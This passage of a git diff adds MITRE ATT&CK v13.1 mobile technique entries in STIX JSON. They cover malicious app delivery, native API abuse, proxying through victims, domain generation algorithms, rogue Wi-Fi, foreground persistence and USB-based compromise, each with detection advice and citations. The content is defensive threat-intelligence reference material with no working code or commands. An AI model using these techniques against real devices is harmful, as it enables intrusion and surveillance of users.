+ "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "network-effects"
+ }
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_tactic_type": [
+ "Without Adversary Device Access"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json
new file mode 100644
index 0000000000000000000000000000000000000000..9299168bbc406974c873a2aa9d895fa7d4b94437
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json
@@ -0,0 +1,62 @@
+{
+ "type": "bundle",
+ "id": "bundle--c601fc44-69c8-4116-a10f-ff47930af628",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Android"
+ ],
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb",
+ "created": "2020-04-28T14:35:37.309Z",
+ "x_mitre_version": "2.0",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1575",
+ "url": "https://attack.mitre.org/techniques/T1575"
+ },
+ {
+ "source_name": "Google NDK Getting Started",
+ "url": "https://developer.android.com/ndk/guides",
+ "description": "Google. (2019, December 27). Getting Started with the NDK. Retrieved April 28, 2020."
+ },
+ {
+ "source_name": "MITRE App Vetting Effectiveness",
+ "url": "https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf",
+ "description": "M. Peck, C. Northern. (2016, August 22). Analyzing the Effectiveness of App Vetting Tools in the Enterprise. Retrieved April 28, 2020."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "Adversaries may use Android\u2019s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.\n\nThe NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)\n\nAdversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)",
+ "modified": "2022-04-08T15:46:24.495Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Native API",
+ "x_mitre_detection": "This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json
new file mode 100644
index 0000000000000000000000000000000000000000..66513a88af7726c965f5fce50f70851fb7920f48
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json
@@ -0,0 +1,84 @@
+{
+ "type": "bundle",
+ "id": "bundle--7874bcb4-393d-437a-b1d6-b5f10197bec4",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_version": "1.2",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1476",
+ "url": "https://attack.mitre.org/techniques/T1476"
+ },
+ {
+ "source_name": "IBTimes-ThirdParty",
+ "url": "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861",
+ "description": "A Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018."
+ },
+ {
+ "source_name": "TrendMicro-RootingMalware",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/",
+ "description": "Jordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018."
+ },
+ {
+ "source_name": "android-trojan-steals-paypal-2fa",
+ "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/",
+ "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019."
+ },
+ {
+ "source_name": "TrendMicro-FlappyBird",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/",
+ "description": "Veo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018."
+ },
+ {
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html",
+ "source_name": "NIST Mobile Threat Catalogue",
+ "external_id": "AUT-9"
+ },
+ {
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html",
+ "source_name": "NIST Mobile Threat Catalogue",
+ "external_id": "ECO-13"
+ },
+ {
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html",
+ "source_name": "NIST Mobile Threat Catalogue",
+ "external_id": "ECO-21"
+ }
+ ],
+ "x_mitre_deprecated": true,
+ "revoked": false,
+ "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nSome Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)",
+ "modified": "2022-04-06T15:41:16.863Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Deliver Malicious App via Other Means",
+ "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution may be able to identify the presence of apps installed from sources other than an authorized app store. \n* An EMM/MDM or mobile threat defense solution may be able to identify Android devices configured to allow apps to be installed from \"Unknown Sources\".\n* Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json
new file mode 100644
index 0000000000000000000000000000000000000000..dcbbf5dee8f7ca5ffed13c95b3f868793c3e778e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fa2033d6-3bec-4aef-9f3c-5e5dd3b7e4cd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067", + "created": "2017-10-25T14:48:07.827Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1469", + "url": "https://attack.mitre.org/techniques/T1469" + }, + { + "source_name": "Honan-Hacking", + "url": "https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/", + "description": "Mat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).", + "modified": "2022-04-06T15:54:28.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Wipe Data Without Authorization", + "x_mitre_detection": "Google provides the ability for users to view their general account activity. 
Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json new file mode 100644 index 0000000000000000000000000000000000000000..06b134a00bff80a614c071e1361306b477ac33d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--00ba31b8-1dba-49c2-9223-4e4eb1260369", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:14.285Z", + "name": "Proxy Through Victim", + "description": "Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary\u2019s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)\n\nThe most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the `Proxy` API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "created": "2020-11-30T14:26:07.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1604", + "external_id": "T1604" + }, + { + "source_name": "Threat Fabric Exobot", + "description": 
"Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json new file mode 100644 index 0000000000000000000000000000000000000000..4017d33ef969dbd0fca4791ee4cbf14b461d892e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--d668b9e7-2ecd-4d20-a1fe-9ef47a368e4c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "created": "2019-09-23T13:11:43.694Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1520", + "url": "https://attack.mitre.org/techniques/T1520" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T20:03:46.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json new file mode 100644 index 0000000000000000000000000000000000000000..5f279311bf9d3136bbd2d425871b9068f1031815 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2c72f9bc-1b57-4ff1-ac0f-752cf51a4c7d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "created": "2017-10-25T14:48:20.727Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1435", + "url": "https://attack.mitre.org/techniques/T1435" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.", + "modified": "2022-04-01T12:50:48.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Calendar Entries", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access calendar information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json new file mode 100644 index 0000000000000000000000000000000000000000..2bfeebca9b9ced7eb656c04d0047214d90f29d55 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--2c9754ff-99f0-443e-a86e-a79baa04973f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "created": "2017-10-25T14:48:21.354Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1465", + "url": "https://attack.mitre.org/techniques/T1465" + }, + { + "source_name": "Kaspersky-DarkHotel", + "url": "https://blog.kaspersky.com/darkhotel-apt/6613/", + "description": "Alex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016." + }, + { + "source_name": "NIST-SP800153", + "url": "http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf", + "description": "M. Souppaya and K. Scarfone. (2012, February). NIST SP 800-153 Guidelines for Securing Wireless Local Area Networks (WLANs). Retrieved December 24, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "LPN-0" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).", + "modified": "2022-04-06T15:51:11.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Wi-Fi Access Points", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json new file mode 100644 index 0000000000000000000000000000000000000000..afc675fbe62de67981ae9f095d8534be0c37d8a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e.json 
@@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--e04e05b0-879a-4dc6-8f34-c3660ee16ae8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:54:25.564Z", + "name": "Foreground Persistence", + "description": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android\u2019s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)\n\nMalicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device\u2019s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n\nMalicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. 
Applications could be vetted for their use of the `startForeground()` API, and could be further scrutinized if usage is found.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "created": "2019-11-19T17:32:20.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1541", + "external_id": "T1541" + }, + { + "source_name": "Android-SensorsOverview", + "description": "Google. (n.d.). Sensors Overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices" + }, + { + "source_name": "Android-ForegroundServices", + "description": "Google. (n.d.). Services overview. Retrieved November 19, 2019.", + "url": "https://developer.android.com/guide/components/services.html#Foreground" + }, + { + "source_name": "TrendMicro-Yellow Camera", + "description": "Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/" + }, + { + "source_name": "BlackHat Sutter Android Foreground 2019", + "description": "Thomas Sutter. (2019, December). Simple Spyware Androids Invisible Foreground Services and How to (Ab)use Them. 
Retrieved December 26, 2019.", + "url": "https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json new file mode 100644 index 0000000000000000000000000000000000000000..a21563f321be50eabec6ef22612300a8e6f255ee --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d.json 
@@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--8185466b-cd0c-4b69-980b-7945622a30ce", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "created": "2017-10-25T14:48:23.233Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1458", + "url": "https://attack.mitre.org/techniques/T1458" + }, + { + "source_name": "Krebs-JuiceJacking", + "url": "http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/", + "description": "Brian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016." + }, + { + "source_name": "GoogleProjectZero-OATmeal", + "url": "https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html", + "description": "Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018." + }, + { + "source_name": "Lau-Mactans", + "url": "https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf", + "description": "Lau et al.. (2013). Mactans: Injecting Malware Into iOS Devices Via Malicious Chargers. Retrieved December 23, 2016." + }, + { + "source_name": "Computerworld-iPhoneCracking", + "url": "https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html", + "description": "Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology \u2013 and police are buying. Retrieved September 21, 2018." 
+ }, + { + "source_name": "IBM-NexusUSB", + "url": "https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/", + "description": "Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-1" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-6" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: 